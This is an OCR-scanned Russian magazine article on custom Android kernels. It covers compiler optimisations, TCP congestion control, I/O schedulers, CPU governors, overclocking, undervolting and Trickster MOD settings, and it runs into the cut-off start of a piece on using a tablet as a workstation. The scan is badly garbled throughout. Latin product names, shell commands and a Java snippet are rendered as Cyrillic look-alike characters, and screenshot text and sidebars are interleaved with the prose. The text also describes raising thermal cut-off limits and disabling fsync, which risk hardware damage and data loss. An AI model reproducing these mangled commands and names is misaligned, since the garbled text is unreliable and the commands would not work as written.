ее (движок тем в СуаподепМосІ), а также добавляя новые си- 
стемные сервисы (эквалайзер в СуаподепМосІ) й оптимизируя 
существующие. 

Авторы популярных прошивок также по мере возможностей 
вносят изменения в ядро Ыпих: оптимизируют (сборка с более 
агрессивными флагами оптимизации компилятора), включают 
в него новую функциональность (например, поддержку шар 
ѴѴіпсІоѵѵз), а также вносят другие изменения вроде возмож- 
ности поднимать частоту процессора выше предусмотренной 
производителем. Зачастую все это остается за кадром, и мно- 
гие пользователи кастомных прошивок даже не подозревают 
об этих возможностях, тем более что тот же СуаподепМосІ по- 
ставляется с кастомным ядром только для ограниченного круга 
девайсов, для которых доступны как исходники родного ядра, 
так и возможность его замены. Например, почти все прошивки 
СуаподепМоб для смартфонов Моіогоіа используют стандарт- 
ное ядро — заменить его на свое невозможно из-за непробива- 
емой защиты загрузчика. 

Однако ядро в смартфонах с разлоченным загрузчиком 
можно заменить отдельно от основной прошивки. И не просто 
заменить, а установить ядро с огромным количеством различ- 
ных функций, которые требуют определенных технических зна- 
ний для управления, а потому обычно не встраиваются в ядра 
популярных прошивок, таких как СуаподепМосІ, АОКР и МЮІ. 
Среди этих функций можно найти поддержку высоких частот 
работы процессора, управление гаммой экрана, режимами 
энергосбережения, высокоэффективные менеджеры питания 
и огромное количество других фич. 

В этой статье мы поговорим о том, что нам могут предло- 
жить создатели кастомных ядер, рассмотрим основные кастом- 
ные ядра для различных устройств, а также попробуем устано- 
вить ядро независимо от основной прошивки и проверим все 
на собственной шкуре. Итак, что обычно предлагают разработ- 
чики альтернативных ядер? 
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ОПТИМИЗАЦИИ 

Зачастую основной целью сборки кастомного ядра становится 
оптимизация производительности. Обычно вендор мобильной 
техники старается сохранить баланс между производительно- 
стью и стабильностью работы, поэтому даже хорошие техники 
оптимизации, способные существенно поднять скорость работы 
девайса, могут быть отвергнуты производителем только на ос- 
новании того, что после их применения некоторые приложения 
начали падать каждый десятый запуск. Само собой, энтузиастов 
такие мелочи не смущают, и многие из них готовы применить 
к ядру собственной сборки любые опции компилятора, алгорит- 
мы энергосбережения и задрать частоту процессора настолько 
высоко, насколько только выдерживает девайс. Среди всех оп- 
тимизационных техник наиболее распространены четыре: 

1. Сборка с помощью компилятора Ыпаго (ЗСС с агрес- 
сивными опциями оптимизации. Писк сезона, ис- 
пользуется почти во всех ядрах. Особую популярность 
этот метод получил после того, как организация Ыпаго 
с помощью каких-то непонятных синтетических тестов 
продемонстрировала 400%-й (!) прирост производи- 
тельности Апбгоісі, собранного с помощью своего ком- 
пилятора. В реальных условиях эффективность Ыпаго 
ССС несколько ниже, но польза от него все же ощутима, 
так как он реально подгоняет код под особенности архи- 
тектуры АВМѵ7 и, если судить по личному опыту, не при- 
носит никаких проблем в стабильность работы ни ядра, 
ни приложений. 

2. Расширение возможностей управления частотой и воль- 
тажом центрального и графического процессоров, а так- 
же использование более эффективного для планшетов 
и смартфонов алгоритма управления энергосбережени- 
ем. Используется во всех кастомных ядрах и ядрах боль- 
шинства серьезных кастомных прошивок. Подробнее эту 
особенность мы рассмотрим в следующем разделе. 

3. Активация более эффективных внутренних механизмов, 
появившихся в последних ядрах Ыпих. Сюда можно от- 
нести 8^^В аллокатор памяти, который, по мнению 
некоторых разработчиков, может быть более эффек- 
тивным, чем 8ШВ, однако никаких экспериментальных 
подтверждений этому нет. Такой аллокатор используется 
в ядре С1а008 для Мехиз 7. 

4. Многие разработчики любят изменять стандартный алго- 
ритм контроля насыщения ТСР (ТСР Сопдгезііоп сопігоі), 
который регулирует размер ТСР-окна на основе мно- 
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сборщики ядер просто читают в Сети документы по 1/0- 
планировщикам для Ыпих и делают выводы. Среди пользо- 
вателей такой подход распространен еще более сильно. 

На самом деле почти все самые производительные и ум- 
ные Ыпир<-планировщики совершенно не подходят для АпсігоісІ: 
они рассчитаны на применение с механическими хранилища- 
ми данных, в которых скорость доступа к данным разнится 
в зависимости от положения головки. Планировщик исполь- 
зует разные схемы объединения запросов в зависимости 
от физического положения данных, поэтому запросы к дан- 



Энтузиасты готовы применить любые 
опции компилятора и задрать частоту 
процессора до предела своего девайса 



жества параметров, чтобы сделать поток пакетов более 
ровным и достичь наивысшей скорости передачи дан- 
ных. Начиная с версии 2.6.19, ядро Ыпих по умолчанию 
использует эффективный алгоритм СУВІС, который так- 
же обычно применяется и в стандартных ядрах Апбгоісі. 
Проблема только в том, что СІІВІС эффективен в прово- 
дных сетях с высокой скоростью передачи данных, тог- 
да как для 3(3- и ѴѴі-Рі-сетей гораздо лучшим выбором 
будет алгоритм ѴѴе5Іѵ\/оос1+. Именно этот алгоритм ис- 
пользуется в ядрах ІеапкегпеІ для Оаіаху Мехиз и ^аих123 
для Мехиз 7, а Тгапко.КегпеІ для (Заіаху 8 II и (Заіаху Мехиз 
так и вообще включает в себя весь набор доступных 
алгоритмов. Просмотреть их список и выбрать нужный 
можно с помощью следующих команд: 

5узс1:1 пе1:.ірѵ4.і:ср_аѵаі1аЬ1е_сопбе5І:іоп_соп^го1 
зузсііі -м пе1;.ірѵ4.1:ср_сопёе5‘1:іоп_соп1:го1=ѵ\/е5-1;\л;оосІ 

Еще один тип оптимизации: изменение стандартно- 
го планировщика ввода-вывода. Ситуация на этом поле 
еще более интересная, так как вместо того, чтобы разо- 
браться в принципах работы планировщиков, некоторые 



ным, которые располагаются близ- 
ко к текущему положению головки, 
будут получать больший приоритет. 
Это совершенно нелогично в случае 
с твердотельной памятью, которая 
гарантирует одинаковую скорость 
доступа ко всем ячейкам. Про- 
двинутые планировщики принесут 
на смартфоне больше вреда, чем 
пользы, а лучший результат покажут самые топорные и прими- 
тивные. В Упих есть три подобных планировщика: 

• Моор (Мо орегаііоп) — так называемый не-планировщик. 
Простая РІРО очередь запросов, первый запрос будет обра- 
ботан первым, второй вторым и так далее. Хорошо подходит 
для твердотельной памяти и позволяет справедливо рас- 
пределить приоритеты приложений на доступ к накопителю. 
Дополнительный плюс: низкая нагрузка на процессор в силу 
ну очень простого принципа работы. Минус: никакого учета 
специфики работы девайса, из-за чего могут возникнуть 
провалы производительности. 

• 810 (8ітрІе 1/0) — аналог планировщика ОеасІІіпе 
без учета близости секторов друг к другу, то есть раз- 
работанный специально для твердотельной памяти. Две 
главные изюминки: приоритет операций чтения над опе- 
рациями записи и группировка операций по процессам 
с выделением каждому процессу кванта времени на вы- 
полнение операций. В смартфонах, где важна скорость 
работы текущего приложения и преобладание операций 
чтения над записью, показывает очень хорошую про- 
изводительность. Доступен в ІеапкегпеІ, ядре Маігіх 
для Мехиз 4 и 8іуаІіКегпеІ. 




УМНЫЙ 

РЕГУЛИРОВЩИК 

ВЗоС’ахОМАРЗбХХ, 
используемых, напри- 
мер, в баіаху 8 II и Саіаху 
Мехиз, есть функция 
8таі1РеЯех, которая 
выполняет роль умной 
системы регулировки 
вольтажа при изменении 
нагрузки на процессор. 
По сути, она избавляет 
от необходимости тон- 
кого тюнинга вольтажа 
пользователем. 
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Устройство: Затзипд баіаху Мехиз С8М 
Кодовое имя: тадиго 

Ядро: Ыпих ѵегзіоп 3.0.61 -ІеапКегпеІ-5.8.2-051 26- 
дс8е48ес (ігпозеуоп@иЬити) (дсс ѵегзіоп 4.7.3 
201 301 02 (ргегеіеазе) (Ііпаго ССС 4.7-201 3.01 ) ) 

#1 553 8МР РРЕЕМРТ Ргі РеЬ 1 1 8:52:04 Р8Т 201 3 

Статистика Скрыть счетчики 

Полное время работы 

3 дней 05:00:51 

Не использовалось 
1350МН2, 1520МН2, 1650МН2 
Время работы 

Глубокий сон: 2 дней 14:23:31 (81%) 

350МН2: 10:54:12(14%) 

700МН2:01:48:19(2%) 
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Игпппи'эгкояимо РРІ I* 



^ сброса изменившегося содержимого открытых файлов на диск. 

Главный экран Существует мнение, что без ^зупс система будет реже обра- 

утилиты настройки щаться к накопителю и таким образом удастся сохранить время 

ядер Тгіскзіег МОО процессора и заряд батареи. Довольно спорное утверждение: 

Тзупс в приложениях используется не так уж и часто и только 
для сохранения действительно важной информации, зато его 
отключение может привести к потере этой же информации 
в случае падения операционной системы или других проблем. 
Возможность отключить Тзупс доступна в ядрах Тгапсо.КегпеІ 
и С1а008, а для управления используется файл /зуз/тосіиіе/ 
зупс/рагате1егзДзупс_епаЫес1, в который следует записать О 
для отключения или 1 для включения. Повторюсь, что использо- 
вать эту возможность не рекомендуется. 

РАЗГОН, ВОЛЬТАЖ И ЭНЕРГОСБЕРЕЖЕНИЕ 

Разгон популярен не только среди владельцев стационарных 
компов и ноутбуков, но и в среде энтузиастов мобильной тех- 
ники. Как и камни архитектуры х86, процессоры и графические 
ядра мобильной техники отлично гонятся. Однако сам способ 
разгона и предпринимаемые для его осуществления шаги 
здесь несколько другие. Дело в том, что стандартные драйверы 
для ЗоС’ов, отвечающие за энергосбережение и изменение ча- 



Несколько интересных аддонов 

ДОБАВЛЯЕМ В ЯДРО НОВЫЕ ФУНКЦИИ 

Само собой, кроме оптимизаций, твиков и разных систем расширенного управ- 
ления оборудованием, в кастомных ядрах также можно найти совершенно новую 
функциональность, которой нет в стандартных ядрах, но которая может быть по- 
лезна пользователям. 




В основном это различные драйверы и файловые системы. Например, 
некоторые ядра включают в себя поддержку модуля СІР8, позволя- 
ющего монтировать V\/іп(^о\л/з-шары. Такой модуль есть в ядре Маігіх 
для Мехиз 8, 1аих123 для Мехиз 7, ЗіуаИКегпеІ и С1_а008. Сам по себе 
он бесполезен, но в маркете есть несколько приложений, позволяющих 
задействовать его возможности. 



# РОѴѴ (НЕАО Оѵег ѴѴРІТЕ) — планировщик, специально раз- 
работанный для мобильных устройств и добавленный в ядро 
всего несколько месяцев назад. Основная задача: перво- 
очередная обработка запросов чтения, но справедливое 
распределение времени и для запросов записи. Считает- 
ся лучшим на данный момент планировщиком для МАМО- 
памяти, по умолчанию используется в ЕеапкегпеІ и Маігіх. 

Стоит сказать, что почти все стандартные прошивки и по- 
ловина кастомных до сих пор используют ядро со стандартным 
для Ыпих планировщиком СРО, что, впрочем, не так уж и плохо, 
поскольку он умеет правильно работать с твердотельными на- 
копителями. С другой стороны, он слишком сложен, создает 
большую нагрузку на процессор (а значит, и батарею) и не учи- 
тывает специфику работы мобильной ОС. Еще один популярный 
выбор — это планировщик Оеасіііпе, который не хуже 810, но из- 
быточен. Посмотреть список доступных планировщиков можно 
с помощью такой команды: 

# саі: /5у5/Ыоск/*/диеие/5сНесІи1ег 

Для изменения применяется такая (где гоѵѵ — это имя пла- 
нировщика): 

# -Рог і іп /5у5/Ыоск/*/риеие/5сЬесІи1ег; сіо есЬо 

ГОМ > $1; сіопе „ 

Некоторые сборщики ядер применяют и другой вид опти- 
мизации, связанный с вводом-выводом. Это отключение си- 
стемного вызова Тзупс, применяемого для принудительного 



Многие ядра имеют в своем составе поддержку так называемой техноло- 
гии 2 гат, позволяющей зарезервировать небольшой объем оперативной 
памяти (-10%) и использовать ее в качестве сжатой области подкачки. 
Происходит как бы расширение количества памяти, без каких-либо 
серьезных последствий для производительности. Доступно в ЕеапкегпеІ, 
включается с помощью Тгіскзіег МОО или командой 2 гат епаЫе. 





Еще одна полезность — это включение в ядро драйвера пИз-Зд (точнее, 
в пакет с ядром, сам драйвер работает как Ыпих-приложение), который 
необходим для монтирования флешек, отформатированных в файловую 
систему МТР8. Этот драйвер есть в ядрах 1аих123 и ЗіуаИКегпеІ. Обычно 
он задействуется автоматически, но, если этого не происходит, можно 
воспользоваться приложением 8ііскМоип1 из маркета. 



Две другие интересные функции — это Разі 118В сИагде и 8\л/еер2ѵѵаке. 
Первая — принудительное включение режима «быстрой зарядки», даже 
если смартфон подключен к 118В-порту компьютера. В силу технических 
ограничений такой режим не может быть включен одновременно с до- 
ступом к карте памяти. Функция Разі 1)8В сИагде позволяет включить 
этот режим по умолчанию, отключив при этом доступ к накопителю. 





8ѵу/еер2ѵѵаке — это новый способ будить устройство, изобретенный 
автором ВгеакесІ-кегпеІ. Смысл его в том, чтобы включать смартфон, 
проведя пальцем по клавишам навигации, располагающимся ниже 
экрана, либо по самому экрану. Это действительно удобная функция, 
но в результате ее включения сенсор будет оставаться активным даже 
во время сна устройства, что может заметно разряжать батарею. 
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стоты процессора, обычно залочены на стандартных частотах, 
поэтому для тонкого тюнинга приходится устанавливать либо 
альтернативный драйвер, либо кастомное ядро. 

Почти все более-менее качественные и популярные кастом- 
ные ядра уже включают в себя разлоченные драйверы, поэто- 
му после их установки возможности управления «мощностью» 
процессора значительно расширяются. Обычно сборщики ка- 
стомных ядер делают две вещи, влияющие на выбор частоты. 
Это расширение частотного диапазона за рамки изначально 
заданных — можно установить как более высокую частоту про- 
цессора, так и очень низкую, что позволяет сохранить батарею 
и увеличить градацию частот, например, вместо трех возмож- 
ных частот предлагается на выбор шесть. Второе — это добав- 
ление возможности регулировки вольтажа процессора, благо- 
даря чему можно снизить напряжение процессора на низких 
частотах для сохранения заряда батареи и повысить на высоких 
для увеличения стабильности работы. 

Всем этим можно управлять с помощью платной утили- 
ты ЗеЮРІ) или же бесплатной Тгіскзіег МОО. Рекомендации 
по управлению все те же, что и для настольных систем. Нижнюю 
частоту процессора лучше установить минимальной, но не ниже 
200 МГц (чтобы избежать лагов), верхний порог повышается по- 
степенно с тестированием стабильности работы, при падении 
которой рекомендуется немного поднять вольтаж для данной 
частоты. Каких-то рекомендаций по вольтажу нет, так как каждый 
процессор уникален и значения будут для всех разными. 

Кроме изменения частот, сборщики зачастую добавля- 
ют в ядро новые алгоритмы управления энергосбережени- 
ем (автоматическим управлением частотой процессора), 
которые, по их мнению, могут показать лучшие результаты 
в сравнении со стандартными. Почти все из них базируются 
на используемом по умолчанию в новых версиях АпсІгоісІ ал- 
горитме Іпіегасііѵе, суть которого заключается в том, чтобы 
резко поднять частоту процессора до максимальной в случае 
повышения нагрузки, а затем постепенно снижать до мини- 
мальной. Он пришел на смену используемому раньше алго- 
ритму ОпОетапсІ, который плавно регулировал частоту в обе 
стороны соразмерно нагрузке, и позволяет сделать систему 
более отзывчивой. Сборщики альтернативных ядер предлага- 
ют на замену Іпіегас^іѵе следующие алгоритмы: 

• 5тагІА88Ѵ2 — переосмысление алгоритма Іпіегасііѵе с фо- 
кусом на сохранение батареи. Основное отличие в том, 
чтобы не дергать процессор на высокие частоты в случае 



Ц Сохранение... 

Тгіскзіег МОО ч/ 

.НОВНЫЕ СПЕЦИФИЧНЫЕ 

Настройки на этой вкладке зависят от ядра 
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V. 

Тгіск8(ег МОО 
позволяет 
активировать почти 
все возможности 
кастомныхядер 

Ф 

Тюнингуем 

цветопередачу 



Какое же ядро выбрать? На этот вопрос нет одно- 
значного ответа, и не потому, что «каждому свое», 
а потому, что в мире существует огромное количе- 
ство Апбгоісі -устройств и почти столько же различ- 
ных ядер. Тем не менее есть несколько популярных 
ядер, которые разрабатываются сразу для несколь- 
ких устройств. Так или иначе многие из них я упо- 
минал по ходу повествования, здесь же приведу их 
краткое описание. 



Іеапкегпеі 

аоо.аІ/СІѵ7сі 

Ядро для Оаіаху Мехиз, Мехиз 7 и Саіаху 5 III. 
Основной акцент при разработке делается 
на простоту и скорость работы. Алгоритм энер- 
госбережения: ІЩегас1іѵеХѴ2, планировщик 1/0: 
РОѴѴ, все перечисленные выше интерфейсы 
управления, поддержка Разі 1)8В сИагде, 8ѵѵар 
и 2 гат, гибкие возможности разгона ОРУ и ОРУ. 
Одно из лучших ядер. Настраивается с помо- 
щью Тгіскзіег МОО. 

Маіпх 

аоо.оІ/РОІВІ . аоо.аІ/2сѵѵА 
Ядро для Мехиз 8 и Мехиз 4. Простое и не- 
перегруженное ядро. Поддержка разгона 
СРУ и ОРУ, СатгпаСопІгоІ, Разі У8В СИагде, 
8ѵѵеер2ѵѵаке, планировщики 1/0: 810, РО\Л/ 
и РІОР8. Твики производительности. Настраи- 
вается с помощью Тгіскзіег МОО. 



^3 



Высокая выкл 

производительность 

ѴѴІРІ 

Поддерживать скорость ѴѴІРІ в режиме сна 

Адаптивная подсветка 

Отключение этой опции делает белый цвет более 
реалистичным при низкой яркости за счет 
использования батареи 



Быстрая зарядка ІШ1 

При активации отключается доступ к телефону 
как накопителю 



Высококачественный выкл" 
звук 

Усиление громкости наушников О 

Температурный лимит 64 

с2:і сэ 



•{Ь Тгіскзіег МОО 


ч/ 


« 19:33 


іиЦИФИЧНЫЕ ЭКРАН 




■ 


Цветовой профиль 


апсігоісі 


Контраст 






Корректировка гаммы 
Сатта смещение 




0 


Красный 






Зеленый 






Синий 






Цветовая палитра 






Коасный 


сЗ 


200 

1 
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Вгіскей-Кегпеі 

аоо.аІ/ксІ5Р4 . аоо.аІ/е2кАѴ 
Простое и неперегруженное ядро для Мехиз 
4 и НТО Опе X. Оптимизации для 8парс1гадоп 
84 и МѴІОІАТедга 3, переработанный режим 
энергосбережения для Тедга 3, возможность 
разгона, алгоритм энергосбережения: тюнинго- 
ванный ОпОетапсІ (доступен и Іпіегасііѵе). 

ВіуаНКегпеІ 

ооо.оІ/СР8ЬО 

Ядро для Оаіаху 8 II и 8 III. Гибкие возможности 
разгона, автоматическая калибровка батареи, 
улучшенный драйвер сенсорного экрана, 
алгоритмы энергосбережения: зтаг1аззѴ2 
и ІиІ2ас^іѵеѴ2, планировщики 1/0: поор, сіеасіііпе, 
СРО, ВРОѴЗг2 (по умолчанию), Ѵ(В), 810. 
Драйверы СІР8 и МТР8 (с автомонтированием). 
Конфигурируется с помощью ЕхТѵѵеакз. 

[гапсо.КегпеІ 

ооо.оІ/тсРОМ 

Ядро для Мехиз 8, Оаіаху Мехиз, Мехиз 4, 

Мехиз 7, Мехиз 10, Оаіаху 8 III, Оаіаху Моіе, 
Оріітиз Опе и Опе X. Возможности ядра 
сильно разнятся от устройства к устройству, 
поэтому подробности придется смотреть 
на месте. Тем не менее, прошивая это ядро, 
ты получишь возможность разгона, тюнинга 
драйверов, отличную производительность, 
а также поддержку различных алгоритмов 
энергосбережения и планировщиков. По сути, 
ядро включает в себя почти все описанные 
в статье твики. Считается одним из лучших до- 
ступных ядер. Имеется приложение для авто- 
матического обновления ^гапко.КегпеІ Урсіаіег. 
Конфигурировать можно с помощью Тгіскзіег 
МОО. 
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кратковременных всплесков нагрузки, для которых хватит 
и низкой производительности процессора. По умолчанию 
используется в ядре Маігіх. 

ІпІегасІіѵеХ — тюнингованный алгоритм Іпіегасііѵе, глав- 
ная особенность которого в залочке процессора на мини- 
мальной указанной пользователем частоте и обесточива- 
нии второго ядра процессора во время отключения экрана. 
По умолчанию используется в ІеапкегпеІ. 

ЬиІгас1іѵеѴ2 — по сути, изобретенный заново ОпОегпапсІ. 
Когда нагрузка на процессор превышает указанную (по 
умолчанию 60%), алгоритм поднимает частоту на опреде- 
ленное число делений (по умолчанию 1), при понижении 
нагрузки — опускает. Особый интерес представляет тем, 
что позволяет самостоятельно задавать параметры работы, 
поэтому подходит для прожженных гиков. 



I - ОолпІігЖ 




(а) 



2 Моѵл - Ооѵ/пІнЖ 




(Ь) 



3 ЙОѴѴ5 - Ооѵѵпкпк 




4 ІІОѴ№ - Ооѵяіііпк 




% ла ' 


Ѵх - 19:33 


Тгіскзіег МОО 


5 


іРО ГРАММЕ УТИУ1ИТЫ 


ОСНОВНЫЕ 


АОВпоѴѴІРІ 


выкл" 



ПортАОВпоѴѴІРІ 5555 



Поддерживать выкл 

активным экран 

Статхс загруз чик а... выкл 

[ЭКСПЕРИМЕНТАЛЬНАЯ ФУНКЦИЯ] Эта функция 
для разблокировки и блокировки Загрузчика 
(ВооІІоадег) без (азіЬооі и потери данных. Если 
кнопка не активна . то есть проблема с авто- 
определением; пожалуйста сообщите 
разработчику 

НозШате устройству 

Нозіпате устанавливается перед загрузкой. 

Если вы хотите восстановить Ьозіпате по 
умолчанию, используйте кнопку сброса в 
диалоге и перезагрузите устройство 

апагоіа-2Ь431 Ь86б6 2(і338с 
Сохранить / Восстановить Ядро 

- Угтппйгтя НТГ. Нрѵіпр пппжим имргк Я-ПРР ппа 

<г-ц) сЗ 
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Тгіскз^ег МОО 


ѵ/ : 


УТИЛИТЫ ОСНОВНЫЕ 


СПЕЦИФИ'І 


ТСР Сопдезбоп Соп!го1 


ѵѵезіѵѵоосі 


1/0 СотгоІ 




Планировщик 


гоѵѵ 


Реаб АЬеасІ Ви^ег Зііе 


256 


СРО Ргедиепсу Сопігоі 




Ргедиепсу Ргобіе 


(без имени) 


Міп 


350000 


Мах 


1200000 


Мах Зсгееп 0^ 


350000 


СРІ) Ооѵегпог СоШгоІ 




Ооѵегпог 


іп^егасбѵех 


^ іС:] 





Вообще, сборщики ядер очень любят придумывать новые 
алгоритмы энергосбережения по причине простоты их реализа- 
ции, поэтому можно найти еще с десяток других. Большинство 
из них полный шлак, и при выборе планировщика следует руко- 
водствоваться правилом: либо один из трех описанных выше, 
либо стандартный Іпіегасііѵе, который, кстати, очень неплох. 
Сделать выбор можно с помощью все той же Тгіскзіег МОО. 

ИНТЕРФЕЙСЫ УПРАВЛЕНИЯ 

Большинство популярных кастомных ядер включают в себя 
несколько механизмов тонкого управления различными па- 
раметрами драйверов, наиболее распространены из которых 
СоІогСопІгоІ, ОатппаСопІгоІ, ЗоипсІСопІгоІ и ТетрСоп^гоІ. 

• СоІогСопІгоІ и СаттаСопІгоІ позволяют управлять пара- 
метрами цветопередачи. Нужно это для того, чтобы отрегу- 
лировать не всегда правильную передачу цветов на экране 
(например, сделать черный черным) или сделать цвета бо- 
лее мягкими и приятными глазу. 

• ЗоипсЮопІгоІ. Можно использовать для того, чтобы сделать 
Воозі звука в том случае, если он слишком тихий. 

• ТетрСопІгоІ. Позволяет регулировать максимальное зна- 
чение датчика температуры (от 50 до 90 градусов), отклю- 
чающего 8оС при перегреве. Полезно для экспериментов 
с разгоном. 

Первые два интерфейса доступны практически везде, вклю- 
чая ядра СуаподепМосІ, вторые два — в ІеапкегпеІ и, может 
быть, в других. Так или иначе, всеми ими можно управлять с по- 
мощью Тгіскзіег МОО. 

КАКУСТАНОВИТЬ? 

Все ядра распространяются в стандартных для АпбгоісІ 2ІР- 
архивах, которые следует прошивать через консоль восста- 
новления точно так же, как альтернативные прошивки. Обычно 
ядра совместимы с любыми прошивками, поэтому, подобрав 
нужное ядро, его можно смело устанавливать. Единственное, 
на что следует обратить внимание, — это версия АпсІгоісІ, с ко- 
торой обеспечена совместимость ядра. Оно может как подойти 
ко всем доступным для устройства версиям АпбгоісІ, так и рабо- 
тать только с одной (разработчик обычно явно говорит об этом). 
Перед прошивкой обязательно сделай бэкап текущей прошив- 
ки с помощью все той же консоли восстановления. Если что-то 
пойдет не так, ты всегда сможешь откатиться, х 



приятная полез- 
ность Тгіскз^ег 
МОО: возможность 
включить АОВ 
поѴѴі-Рі 



Ф 

Выбираем алгоритм 
перезагрузки ТСР, 
планировщик 1/0 
и алгоритм управ- 
ления энергосбере- 
жением 



В ЗС-сетях алгоритм 
контроля перегрузки 
ТСРѴѴезІѵѵоосН- 
всегда выигрывает 



ВЫВОДЫ 

Как ты смог убедить- 
ся, кастомныеядра 
обладают множеством 
преимуществ перед 
ядрами, используемыми 
в стандартных или сто- 
ронних прошивках. 

А что еще более важно - 
необязательно знать 
все тонкости АпсІгоісІ, 
чтобы их использовать, 
достаточно скачать 
и установить 21Р-архив. 





ОТСТУПЛЕНИЕ 

ДЕСКТОПОВ 

ПРЕВРАЩАЕМ ПЛАНШЕТ ® 

В ПОЛНОЦЕННОЕ РАБОЧЕЕ МЕСТО 
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АЗиЗ ТгапзТогтег и МісгозоЛ Зигіасе — великолепные 
девайсы, сочетающие в себе планшет и полноцен- 
ный ноутбук. В дороге такая вещь не занимает много 
места и отлично подходит и для работы, и для отды- 
ха. Достал из сумки тоненькую клавиатуру, и у тебя 
в руках ноутбук, убрал обратно — планшет. Удобно. 

Но можно ли сделать нечто подобное из обычного 
АпбгоісІ-планшета? Легко! 



Коннектим планшет со смартфоном 




ЗАЧЕМ? 

Даже самые дешевые современные планшеты имеют чрезвы- 
чайно мощную начинку, производительности которой вполне 
хватает, чтобы посоревноваться с нетбуками. Однако у планше- 
та совершенно другое назначение, которое ставит перед нами 
очевидную проблему: что взять с собой в дорогу? Удобный 
для чтения книг, веб-серфинга и игр планшет либо нетбук — 
прекрасный инструмент для общения и работы? И то и другое 
таскать с собой — занятие не самое веселое, но ведь мы можем 
пойти и по иному пути. 

Начнем с того, что почти любой планшет под управлением 
АпбгоісІ поддерживает подключение клавиатуры и мыши — 
фактически это превращает его в своеобразный моноблочный 
комп, который можно прислонить к чему-нибудь, расположить 
перед собой клавиатуру и мышь и преспокойно работать. В до- 
роге это не слишком удобно, да и чересчур даже для гика, 
поэтому умные китайцы придумали специальные чехлы 
со встроенной клавиатурой, которые легким движением руки 
превращают планшет в интересный девайс, похожий на нетбук. 
Прикупить такой чехол определенно стоит, тем более что обой- 
дется он не более чем в 20 американских рублей, а клавиатура 
там действительно хорошая. 

Второе — это ОС. Казалось бы, АпбгоісІ совсем не пред- 
назначен для работы и без полноценного нетбука/ноутбука 
не обойтись. Но и здесь все в порядке, браузеры легко обслу- 
живают по несколько вкладок, имеется множество клавиатур- 
ных комбинаций, полноценный набор ІІМІХ-утилит, куча софта 
для администрирования, компиляторы, утилиты, веб-серверы 
и все, о чем ты только можешь подумать, кроме совсем уж про- 
фессионального софта типа РІіоЩзИор или РгоТооІз. Но я со- 
мневаюсь, что кто-то будет заниматься графическим артом или 
сведением композиции, сидя на пассажирском сидении авто- 
мобиля, движущегося по «великолепным» русским дорогам. 

Говоря другими словами, в планшете есть все, чтобы ис- 
пользовать его в качестве рабочей станции, а вот о том, как это 
«все» задействовать на полную катушку, мы и поговорим далее. 

БАЗОВЫЙ МИНИМУМ 

Итак, у нас есть планшет под управлением АпбгоісІ 4, клавиату- 
ра, мышь (опционально) и желание превратить все это в рабо- 
чую лошадку. 

Сразу оговорюсь, что УЗВ-клаву и мышь можно воткнуть 
только в планшет с поддержкой режима ІІЗВ Ііозі (ОТО), так 
что, если этой опции в планшете нет, придется использовать 
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более дорогие ВІиеІооШ-аксессуары, а если нет и поддержки 
ВІиеІооШ, то ничего не поделаешь — такой планшет не годится. 

Если режим ІІ8В-ХОСТ поддерживается, клавиатуру или 
мышь следует подключать с помощью ОТО-кабеля, который 
обычно идет в комплекте с планшетом и представляет со- 
бой кабель типа тіпіиЗВ-папа с одной стороны и полноцен- 
ный изв мама — с другой (если в планшете полноразмерные 
иЗВ-порты, можно втыкать прямо в них). Если же в комплекте 
его не оказалось, ОТѲ-кабель можно купить в любом магазине 
мобильной техники или заказать в Китае за один доллар (он ни- 
чем не хуже). Хочу предупредить, что обычно не все порты под- 
держивают режим хоста, поэтому втыкать надо в правильный 
(обычно он подписан Нозі или ОТО). 

Когда все будет на руках, цепляем к планшету мышь и клави- 
атуру — и вуаля, все работает. Можно было бы сказать, что этого 
будет достаточно, но АпсІгоісІ может предложить гораздо более 
продвинутые возможности управления с помощью клавиатуры. 
Одна из основных — это довольно развитая и удобная система 
клавиатурных комбинаций, которая существует еще с первых 
версий ОС. Так, для навигации по рабочему столу и различным 
меню можно использовать «стрелки», <ТаЬ> и <Еп1ег>, клавиша 
<Езс> заменяет кнопку «Назад», а <\Л/іп + ЕзО — кнопку «До- 
мой». Кроме них, есть еще целый набор других управляющих 
комбинаций, в том числе шорткаты для запуска приложений: 



раскате сот тусовірапу.туарр; 

іврог( ап(1гоі<1 арр.*; 
іярогі агк1гоід .о5 . *; 
ітрогі апсігоісі . ѵіеѵѵ. *; 
імрог^ апсігоісі . ѵѵісідеі . 

риЫіс с1а5$ МаіпАссіѵйу ехііепсіз Ассіѵісу 
{ 

/** Саііесі ѵѵЬеп Ціе асСіѵіСу І5 І'ігзі: сгеагесі */ 
@0ѵеггіс1е 

риЫіс ѵоісі опСгеаге(ВипсІ1е $аѵесіІп$(апсе5сасе) 

{ 

зирег опСгеаіе(5аѵесІІп5іапсе5^а(е) ; 
5есСопіегиѴіеѵѵ(К. ІауоиС . паіп) ; 

> 

^ /тп(/8()сагс1/АррРго]ес18/МуАрр 

^ Ргоіесі Ргореліез. . 

^ а88еі8 

А з*" 

А 

сІавзраіЬ 




Клавиатурные комбинации АпсІгоісІ ____________ 

<Е5с> - аналог кнопки «Назад» 

<1лІіп + Езо - аналог КНОПКИ «Домой» 

<СТг1 +. Е5 с> - аналог кнопки «Меню» 

<А11: + ТаЬ> - переключение между приложениями 

<С1:г1 + 5расе> - переключение раскладки 
<СТг1 + Р> - открыть настройки 

<С1:г1 + М> - управление установленными приложениями 

<СТг1 + М> - см^^ 

<Ыіп+Е> - написать письмо 

<иііп + Р> - проигрыватель музыки 

<Ыіп + А>- калькулятор 

<Міп +.5> “ написать 5М5 

<1лІіп + 1> - календарь 

<ІлІіп + С> - контакты 

<Шп + В>„- браузер 
<ІАІіп + М> - карты Соо§1е 
<1лІіп + 5расе> - поиск 

<С1:г1 + А11: + 0е1> - перезагрузка 

Особое место среди них занимает комбинация <ѴѴіп + 
Зрасе>, открывающая окно поиска, которое в АпсІгоісІ анало- 
гично окну поиска ОЗ X или УЬипЩ, то есть позволяет искать 
не только в интернете, но и среди установленных приложений, 
контактов и закладок браузера. Очень удобный инструмент 
управления с клавиатуры. 

Комбинации клавиш также доступны и в приложениях, одна- 
ко только малая часть разработчиков реализует такое управле- 
ние. Даже среди браузеров, где эта функциональность просто 
необходима, я смог найти только два, которыми можно полно- 
ценно управлять с помощью клавиатуры. Это стандартный бра- 
узер и Ооодіе СІтготе, которые поддерживают следующий на- 
бор комбинаций: 

Комбинации браузера 

<С1:г1 + М/Т> - новая вкладка 

<ССг1 + І/0> - увеличить/уменьшить масштаб 

<С-1:г1 + 3 > - менеджер закачек 

сССгІ ,+ К> - перезагрузить страницу 

<С-1:г1 + Р> - поиск 

